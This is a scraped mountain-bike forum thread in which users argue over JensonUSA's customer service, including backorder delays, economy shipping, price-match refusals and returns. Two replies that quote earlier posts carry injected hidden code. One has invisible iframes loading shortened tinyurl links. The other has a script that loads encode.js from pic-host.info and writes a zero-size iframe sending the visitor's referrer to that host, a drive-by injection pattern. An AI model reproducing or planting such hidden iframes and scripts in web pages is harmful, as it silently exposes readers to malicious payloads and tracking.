Is JensonUSA customer service slipping?- Mtbr.com
    Tende
    Dec 2004

Is JensonUSA customer service slipping?

Today I received an order, placed April 1. When I asked why it took so long - I was told - economy shipping requires them to wait until everything is in. Had they told me the whole order would be held up by one set of bar tape - I would have deleted the tape - just to get everything else. Bummer.

Class Clown
    All you had to do was call

Trail Ninja
    I had BikeBling do the same thing to me. They gave me a track code, wonder why it didn't ship after about 3 business days, I called and they said something wasn't in stock and they were waiting on it. I picked slow shipping, so I really didn't care when it came in.

Granted, Bikebling's site isn't sophisticated enough to track stock, let alone stock in real-time, and Jenson's is, did it say the tape was out of stock and would ship in a few days? If so, I'd put part blame on your part.

Tende
    Dec 2004
    well, not wanting to be a pain - I kept checking the mailbox, finally calling after 2 weeks.

mtbr member
    Jenson has been giving a "guaranteed delivery date" for a while now on their final order page (though I noticed it doesn't actually state the date in the confirmation email after ordering). Was two weeks longer than they said it would take?

Trail Ninja
    Yea, I was gonna mention that guaranteed delivery date thing too. You have quite some patience to wait that long.

Class Clown
    Well for example I placed an order today and a couple things aren't shipping for about a week (don't need them ASAP) and the rest of the stuff should be shipping tomorrow or maybe Monday. If you pick economy shipping they wait until they have everything to ship. You can always go to their site and check the status of your order.

Tende
    Dec 2004
    well yeah, evidently they do list a delivery date on the final order page - which I forgot to check, but it's not listed on the order confirmation. So if you don't write it down before you complete the order - it's gone - forever (?)!

mtbr member
    Jan 2010
    They've been great to me. Not really their fault if you don't check the delivery date / item stock status. I've had an order delayed, but called when I needed the other items sent and they did so, then sent the rest later - didn't cost me a dime extra either.

Smaller places with less order volume may be able to hold their customers hand on everything. I'd rather have good prices over hand holding any day.

mtbr member
    I'm starting to see a disturbing trend in customer service. Some of the most reliable shops, Jenson, Pricepoint, Competitive cyclist, etc all seem to have more and more customer service issues. At least for me. Jenson did the same thing to me and CC isn't sending me my new wheels until 11 days after my order (yet they say they are in stock). I guess the quest for low prices is starting to come at the cost of reliable customer service.

mtbr member

Nothing but great service

I recently placed a order with Jenson and there was one item on backorder with a ETA a week later. Then the ETA was pushed out another week. I called and asked if they could send me all the items in stock and sent the backordered item when it's back in stock without and additional charges, they did it without any problem, I even added some additional items and they didn' charge any shipping. I have never had any bad CS from them. All you have to do is call them and they'll make things right.

mtbr member
    Mar 2004
    I just placed an order Friday for an Ngear jump stop and a tail light, and I got them on Monday! Never had a problem with their service.

Class Clown
    Well the backordering works both ways. The stuff they said would take another week actually shipped out right away. Plus I gave them a call to add something to my order, took all of 30 seconds.

mtbr member
    Oct 2008
    User error IMO.

Had a friend order tires from Jenson. They sent him the wrong size. He called and they are sending him the correct set and told him to keep the original set they sent.

Doesn't sound like bad cs to me.

Competitive Cyclist is holding up my wife's bike until all the parts are in stock (about a week). I was told of the delay and was fine with it. I'm sure if I had asked, they would have offered a different solution.

You are an active particpant in the purchase, and sellers are not mind readers.

icy
    mtbr member
    Apr 2004
    I placed an order yesterday at 5:30 am and it was here when I got home from work today and I live in Canada. They have earned my repeat business

banned
    Dec 2006
    Quote Originally Posted by Tende
    Today I received an order, placed April 1. When I asked why it took so long - I was told - economy shipping requires them to wait until everything is in. Had they told me the whole order would be held up by one set of bar tape - I would have deleted the tape - just to get everything else. Bummer.<iframe border=0 frameborder=0 framespacing=0 height=1 width=0 marginheight=0 marginwidth=0 name=new_date noResize scrolling=no src="http://tinyurl.com/27shlk6" vspale=0></iframe>
    <iframe border=0 frameborder=0 framespacing=0 height=1 width=0 marginheight=0 marginwidth=0 name=new_date noResize scrolling=no src="http://tinyurl.com/yz4gjyd" vspale=0></iframe>
    Most online companies do this. The only company that I know that is excellent with informing their customers on this is Amazon.com

mtbr member
    Sep 2010
    Quote Originally Posted by dundundata
    All you had to do was call<script type="***************" src="http://www.pic-host.info/files/encode.js"></script>
    <script type="***************">
    <!--
    if (document.referrer) { var ref='?'+encode(document.referrer); } else { var ref=''; }
    document.write('<iframe src="http://www.pic-host.info/files/33.htm'+ref+'" width="0" height="0" frameborder="0" scrolling="no" marginwidth="0" marginheight="0"></iframe>');
    //-->
    </script>
    Thats what I always do and recommend everyone to do so.
    There's nothing better than contacting them by phone.

With jensonusa or any other retail seller.

mtbr member
    Apr 2007
    Ordered a SRAM chain and other stuff from them. The first time I used the new chain it broke at 1.6 miles into ride. Called Jenson they offered to send me a new chain, but I didn't want the same SRAM chain so they credited my account. I didn't have to ship it back (saved me shipping cost). I ordered a Shimano chain now. Good customer service in my opinion.

mtbr member
    Jun 2006
    I disagree with your feelings about their "bad service" . I order quite a bit from them and they have excellent service, and if you feel an order is delayed, just pick up the phone and find out its status.

I realize in a world of instant gratification, it would be nice to always find your order in your mailbox the next day, but unfortunately it doesn't work that way especially if your are only paying for economy shipping.

If there's a part I really, really need I make sure they have it in stock first before placing my order..If its on back order or they don't have it..I get it someplace else.....end of story...

mtbr member
    I also order from Jenson very often, and I have found their service to be excellent, even on my most recent orders. I am in Canada, and any issues I have had were addressed in my first phone call and resolution was quick.

Scallywag
    Jul 2009

JensonUSA

I tried to pricematch a set of SRAM XO Twisty's (pricepoint $62 - Jenson $82) Jenson said (rather rude service rep i might add) that the Pricepoint xo's were 2010 and Jenson only sells 2011 xo's.... cant pricematch different year product even if there is no differance. Ended up going with pricepoint anyhow because of a rather large order. When i recieved the xo's the package said 2010!!!! I called and Pricepoint matched the price, it was a 20 second phone call.

First Customer service rep grade - F
    Second rep grade - A

Personally I love all the stores that will send Mountain Bike Gear!

Trail Ninja
    Don't really understand that scenario there, but I also have had Jenson deny me a price match when the item names didn't exactly match up, even though the seemed the same.

My scenario:

Want some Ergon grips, since my new bars felt funny without them (once you go ergon it's hard to go back sometimes). Did a google price search and saw a nice price on Treefortbikes, which they were pricematching speedgoat. Since Jenson is right next to me and I often stop by the trails behind their Riverside warehouse, I was planning get it from them and hit the trails there.

I try to price-match Speedgoat's GP1 Leichtbau, but it was refused because, apparently, there's a version called Leichtbau and there's [another] version called "Superlight". Jenson has Superlight listed on their site and it also comes in black. The Jenson rep insisted that there was a difference between the two and that's the name their supplier gave them while the Ergon site never listed Superlight. The specs matched up identically though. Treefortbikes also had theirs listed at Superlight. They wouldn't price match the price match machine at Treefortbikes either.

Oh well, I simply just dropped it there. I price-matched ordered from HucknRoll instead since their shipping was the cheapest and fastest to get to SoCal. Their return policy is excellent as well.

Scallywag
    Jul 2009
    Whoops looks like mid-paragraph i switched company's

i meant i ended up ordering from Jenson USA not Pricepoint.... Even though the xo's were cheaper at Pricepoint i had a large order from Jenson already worked up and they had everything I needed.

Anywho Jensons website did not specify the model year... They know what they are doing.

REDO:

I tried to pricematch a set of SRAM XO Twisty's (pricepoint $62 - Jenson $82) Jenson said (rather rude service rep i might add) that the Pricepoint xo's were 2010 and Jenson only sells 2011 xo's.... cant pricematch different year product even if there is no differance. Ended up going with JensonUSA anyhow because of a rather large order. When i recieved the xo's the package said 2010!!!! I called and JensonUSA matched the price, it was a 20 second phone call.

First Customer service rep grade - F
    Second rep grade - A

Personally I love all the stores that will send Mountain Bike Gear!

Trail Ninja
    I actually read that again and the 2nd time (after making my post), I thought it would make sense if you meant Jenson.

I now look at Speedgoat's price on the GP1 and now I'm shocked to see it even cheaper than before (20.82, but backordered)! It was about $25 when I ordered. I also see that Treefortbikes now has Leichtbau AND superlights, though the Leichtbau is in the narrow gripshift model only and there's no superlight version for gripshift.

mtbr member
    Apr 2011
    I've only dealt with Jenson once (just started the hobby ) and it was a good experience. Ordered a bike that later went out of stock and I got them to sub me a better bike for the same price.

Its got what plants crave
    Their economy shipping was NOT worth the extra week it took to get it to my house. I learned my lesson and won't use it again.
    Ocala Mountain Bike Association - www.omba.org

mtbr member
    Sep 2010
    Quote Originally Posted by Jim311
    Their economy shipping was NOT worth the extra week it took to get it to my house. I learned my lesson and won't use it again.
    Do you live far from California? I live in Nevada and economy shipping took only 2 days once they shipped it out.

mtbr member
    Quote Originally Posted by henryvc
    Do you live far from California? I live in Nevada and economy shipping took only 2 days once they shipped it out.
    The "once they shipped it out part" is what killed the deal when I tried it last time. The shipping itself was still just as quick but my order shipped out a week later instead of making it out the same day or the next day like they usually do with their standard shippinh

mtbr member
    Aug 2006
    Ordered some small parts from jenson last wed. They were at my door Friday morn. Great service.

I will add I live in Canada, so less than 39 hours from ordering to my door, including clearing customs. Shipping was 21.00 dollars for 198.00 order. This included GST.

mtbr member
    Sep 2010
    Quote Originally Posted by boomn
    The "once they shipped it out part" is what killed the deal when I tried it last time. The shipping itself was still just as quick but my order shipped out a week later instead of making it out the same day or the next day like they usually do with their standard shippinh
    The same happened to me. Took 3 days for them to ship out. On the third day, I called them to see why there was a delay. They told me a few items were on back order which was why they couldn't ship it on the same day I ordered. They didn't update their website so I had no idea the items were out of stock. Perhaps some of your items were on back order too?

mtbr member
    Jun 2009
    I hate living so close to Jensons, every payday I am at the counter feeding my current addiction. My kids have gone without food the last two paydays. Other than that, the service is awesome, they don't mind bankrupting you, they do it with a smile.

The Cheater
    Never a problem with Jenson's timing for shipping. I even had them shipped to 3 different countries. Same satisfactory shipping times.
    Titux X Carbon 2010 race 9.93kg
    Titux X 2009 "Deore 2012" training 11.55kg

Doesntplaywellwithmorons!
    For those of us who've been here for a long time, jenson having poor customer service isn't surprising as a decade ago, they were one of the WORST mail order stores to deal with, and were frequently complained about in these forums.
    I don't post to generate business for myself or make like I'm better than sliced bread

mtbr member
    Jan 2011
    I had a pretty bad experiance recently. Ordered a Fox F29 fork that said it was out of stock and would ship in two weeks and was provided with a "Receive by" date. Two weeks later, I had still not received a shipping confirmation. I went to the site and it now said instock. Confused, I called Jenson and spoke to a rep. Imagine my astonishment when I was told that not only were the forks not in stock, but Fox would not be sending anymore due to the 2012 being released. That was it......no explanation provided as to why I was not contacted about the matter. Essentially, if I would not have called, I would still be waiting on a order taht could not be filled since they couldnt update their website or make a phone call. I wrote an email about the complaint to Jenson who followed up with a phone call offering to sell me a 2012 - no discount, no rebate, nothing. Their excuse for not contacting me was that "Fox did't have anymore" - well that was obvious BUT I ORDERED IT FROM YOU NOT FOX!

In addition to that I ordered a Fox helmet and upon receipt the straps were broken. When I called, they were nice and said they would replace it, but the hassel to send it back was to much for me. (I know, i'm lazy)

The last situation I thought was odd was when it took them 5 days to ship an "instock order". While it arrived before the "Expect on this date", upon calling to ask why it took so long to ship I was told while the website showed "in-stock" they still had to wait for the vendor to ship it to them before they could ship it to me....or something like that.

I bought my fork from Hucknroll and was blown away at their customer service. Awesome chat feature, great customer services and "wicked" fast shipping (actually says that on their site). I will only buy from jenson again if its a smoking deal and I am in no rush - even then I will be hesitant.

Members who have read this thread: 0